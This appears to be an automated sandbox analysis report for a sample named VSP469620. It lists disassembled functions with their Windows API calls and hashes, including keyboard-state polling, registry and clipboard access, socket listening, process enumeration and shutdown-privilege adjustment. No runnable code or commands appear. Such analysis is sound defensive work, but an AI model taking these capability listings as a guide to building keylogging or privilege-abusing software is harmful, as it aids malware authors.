                                                              • API String ID: 0-4052911093
                                                              • Opcode ID: bdaaca2449614443e46189adb4d0ea0719a733be0165a920919c2f1591f15c56
                                                              • Instruction ID: cec4f3eff3c1c0c94be15f3045e0bf501ea7fee993747042cd51161642bd7ad8
                                                              • Opcode Fuzzy Hash: bdaaca2449614443e46189adb4d0ea0719a733be0165a920919c2f1591f15c56
                                                              • Instruction Fuzzy Hash: 31726F71E042299BDB24CF58D8817EEB7F5FF48710F2481AAE815EB281DB749E41DB90
                                                              Function 00B131BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B1328E
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B1332D
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B133C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B13604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B13611
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: 2211f214fdc4c89de07b3690d1326825dcea8ca3f869d57a0c1511f4d45848db
                                                              • Instruction ID: a40e6f13162b17eb33cb7c11250ed5198218f97d2cf6f3042b692b0d4eda5ce7
                                                              • Opcode Fuzzy Hash: 2211f214fdc4c89de07b3690d1326825dcea8ca3f869d57a0c1511f4d45848db
                                                              • Instruction Fuzzy Hash: 51E16D31604200AFCB15DF28C991E6EBBE9FF88B10F1484ADF54ADB262DB31E945CB51
                                                              Function 00AF2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00AF2B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00AF2BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00AF2BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00AF2C15
                                                              • GetKeyState.USER32(000000A1), ref: 00AF2C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00AF2C42
                                                              • GetKeyState.USER32(00000011), ref: 00AF2C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00AF2C6C
                                                              • GetKeyState.USER32(00000012), ref: 00AF2C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00AF2C96
                                                              • GetKeyState.USER32(0000005B), ref: 00AF2CA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 6d851147800665ab670451846cbb23c49f59850987f53d09c229661862572220
                                                              • Instruction ID: c499adad0a62d447dfbffa0dbd7ff4ce9ad4bd8f3aa549e0dcb52b23a064ad5a
                                                              • Opcode Fuzzy Hash: 6d851147800665ab670451846cbb23c49f59850987f53d09c229661862572220
                                                              • Instruction Fuzzy Hash: E54184345047CD6DFF359BE499143B9BEA0AB21344F048059FBC6572C2DBA499C9C7A2
                                                              Function 00B06D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 854ab65bf0128bd3db66c0b97d706eb7865d7933466fe4155164ea4583a9bb54
                                                              • Instruction ID: d247da267c030dda37df8b75a116416828755d28ea176876abdce1f8d771ab66
                                                              • Opcode Fuzzy Hash: 854ab65bf0128bd3db66c0b97d706eb7865d7933466fe4155164ea4583a9bb54
                                                              • Instruction Fuzzy Hash: 99217F313002149FDB11AF69ED4AB2E7BE8FF44711F15846AF91ADB2A1DF30E9118B54
                                                              Function 00B0C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AE9ABF: CLSIDFromProgID.OLE32 ref: 00AE9ADC
                                                                • Part of subcall function 00AE9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00AE9AF7
                                                                • Part of subcall function 00AE9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00AE9B05
                                                                • Part of subcall function 00AE9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AE9B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B0C235
                                                              • _memset.LIBCMT ref: 00B0C242
                                                              • _memset.LIBCMT ref: 00B0C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00B0C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 00B0C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 00B0C3E5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 6b7c43dcfd57febfb1ba03cce11aba58be75e9ae6be7e9605fe4b5e6d07e058c
                                                              • Instruction ID: 9f6eb5c6c3a6a74504c936d594951ce8a67e4bf18e071d94737928b4f31f91a8
                                                              • Opcode Fuzzy Hash: 6b7c43dcfd57febfb1ba03cce11aba58be75e9ae6be7e9605fe4b5e6d07e058c
                                                              • Instruction Fuzzy Hash: C4912A71D00218ABDB10DF94DD95EDEBBB9FF04710F20815AF515A7291EB70AA45CFA0
                                                              Function 00B01F94 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B01FE1
                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B02011
                                                              • _wcscmp.LIBCMT ref: 00B02025
                                                              • _wcscmp.LIBCMT ref: 00B02040
                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B020DE
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B020F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep
                                                              • String ID: *.*
                                                              • API String ID: 3356411064-438819550
                                                              • Opcode ID: 8ea05729971abd210c0c4927b4a0696f2be99fc9ef3e2e5c2ae9688d223f0a48
                                                              • Instruction ID: 4ea056faf4e44506688880e0f1a8566b453d22bae4464b7094dfe9a9a18b1e25
                                                              • Opcode Fuzzy Hash: 8ea05729971abd210c0c4927b4a0696f2be99fc9ef3e2e5c2ae9688d223f0a48
                                                              • Instruction Fuzzy Hash: 7B417B7190021AAFCF14DFA4CD49BEEBBB8FF05314F10459AE815A31D2EB709A88CB50
                                                              Function 00AF79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AEB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AEB180
                                                                • Part of subcall function 00AEB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AEB1AD
                                                                • Part of subcall function 00AEB134: GetLastError.KERNEL32 ref: 00AEB1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00AF7A0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 3400913c2dfeabc5927c4c92960de32ffa6f4ac2bdcc649eea84c791ab53f4fc
                                                              • Instruction ID: f3d533a212fe7315458758ef5c33b96183574d1ecd4b66d25ae491e2b49e992e
                                                              • Opcode Fuzzy Hash: 3400913c2dfeabc5927c4c92960de32ffa6f4ac2bdcc649eea84c791ab53f4fc
                                                              • Instruction Fuzzy Hash: EA01A7717582296AF72877F4DC5AFBF72689B047C0F260564FB43A20D2E9A15E0081B0
                                                              Function 00B08C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B08CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00B08CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00B08CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00B08D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 7a68a25d91325744404f1b7bd2b1cdff9aacaca0236ce73f6f2be530ec16aafe
                                                              • Instruction ID: fa2698ef6acf20b925dd931cffe3f36a9279680f1d45bb07f58d68bcae333f7a
                                                              • Opcode Fuzzy Hash: 7a68a25d91325744404f1b7bd2b1cdff9aacaca0236ce73f6f2be530ec16aafe
                                                              • Instruction Fuzzy Hash: 9221A531600204AFDB10AF64DA45B6EBBE9EF44310F148558F956A72D2CF30AD418B51
                                                              Function 00AEAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AEAFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00AEAFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AEAFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 00AEAFCF
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AEAFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AEB012
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: e1a49f23000f4f3c3a7348a5985b43db920774a2aca268c52ebbc8c9c5373c9e
                                                              • Instruction ID: ff43408068355c6720ef0324cb4392c0f0e937a9cdcc9e09ea6cfce713144053
                                                              • Opcode Fuzzy Hash: e1a49f23000f4f3c3a7348a5985b43db920774a2aca268c52ebbc8c9c5373c9e
                                                              • Instruction Fuzzy Hash: 3A215B72144249AFDF028FA5ED09FAE7BA9EF44704F148055FA02A2161C776ED21EB61
                                                              Function 00AF6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AF6554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AF6564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AF6583
                                                              • __wsplitpath.LIBCMT ref: 00AF65A7
                                                              • _wcscat.LIBCMT ref: 00AF65BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AF65F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              • Opcode ID: e03a89c455784b5963e67720e9b4fbfa4cb6eb0c004754df00f3214cba7e7ebf
                                                              • Instruction ID: f848a6f751690b5da617b5c25fb08e3e700dba75a13d7e0da5c55fd84adf9e3e
                                                              • Opcode Fuzzy Hash: e03a89c455784b5963e67720e9b4fbfa4cb6eb0c004754df00f3214cba7e7ebf
                                                              • Instruction Fuzzy Hash: 4E21847190021CABDB10ABA4DD88FEEBBBCAB49300F5004A9F645E7141EB719F85CB60
                                                              Function 00B0923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B0A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00B09296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00B092B9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              • Opcode ID: d8371675c79cca506b9148a317803f3b5e4c63a01c7998e1eaf647de01ad837c
                                                              • Instruction ID: fa8560dd54b168e9e52adbd2dcf91a43cd44dc3bac3337584b8df0ebbcc9eb59
                                                              • Opcode Fuzzy Hash: d8371675c79cca506b9148a317803f3b5e4c63a01c7998e1eaf647de01ad837c
                                                              • Instruction Fuzzy Hash: 6641C070600204AFDB10AB68CA82F7EB7EDEF44724F15844CF956AB3D3DA749D018B91
                                                              Function 00AFEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFEB8A
                                                              • _wcscmp.LIBCMT ref: 00AFEBBA
                                                              • _wcscmp.LIBCMT ref: 00AFEBCF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00AFEBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AFEC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: 876fd47ff3f27d5f452a23e9d9dff4c802896c23d191da5ae9a21c8a0d3bec3e
                                                              • Instruction ID: 6f6601d637fe3f42edb4e15f102f852616bbe7609ab1feccccfdf748c8b93edf
                                                              • Opcode Fuzzy Hash: 876fd47ff3f27d5f452a23e9d9dff4c802896c23d191da5ae9a21c8a0d3bec3e
                                                              • Instruction Fuzzy Hash: 7B41AA356047069FCB18DF68C491EAAB3E4FF49324F10456EFA5A8B3A1DB31A941CB91
                                                              Function 00B18111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 627cc84b5d8bdccb1e2e016dce2ad9017dd33c14834966ea0bb3059820cd09f7
                                                              • Instruction ID: 09ed4c050a294abf2d9636ce94b75c1a9944cecb494d89be94487a3a315acece
                                                              • Opcode Fuzzy Hash: 627cc84b5d8bdccb1e2e016dce2ad9017dd33c14834966ea0bb3059820cd09f7
                                                              • Instruction Fuzzy Hash: 461190323002106BE7211F26EC45FAEBBDCFF59760B554469F849E7251CF30995286A0
                                                              Function 00AB9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                              • API String ID: 0-1546025612
                                                              • Opcode ID: 86de983dc4324a474d096157c34e84041ed7b78eb4d9ff5d0baa1254674aab90
                                                              • Instruction ID: 991ecdc598bf4755043a29dfc8c6e70ac2a012b187368ef060bb36a63d46eb85
                                                              • Opcode Fuzzy Hash: 86de983dc4324a474d096157c34e84041ed7b78eb4d9ff5d0baa1254674aab90
                                                              • Instruction Fuzzy Hash: E7927E71E0021ACBDF24CF58C8807FEB7B5FB54314F2481AAE916AB286D7719D81DB91
                                                              Function 00ACE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00ACE014,774D0AE0,00ACDEF1,00B4DC38,?,?), ref: 00ACE02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00ACE03E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 0864def3b87b693710ebaeca10ac4583f5574b4b02f2926dc8f3ba9fb2387645
                                                              • Instruction ID: 8768e830b7b8e2e71193e3850177a13ffda7f5cf5b42a5754d3516c69f9fdff2
                                                              • Opcode Fuzzy Hash: 0864def3b87b693710ebaeca10ac4583f5574b4b02f2926dc8f3ba9fb2387645
                                                              • Instruction Fuzzy Hash: F7D0C770540F129FD7359F65FC08B5676D4AB04711F29446EE495E3160DFB8D8808A90
                                                              Function 00AF13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AF13DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
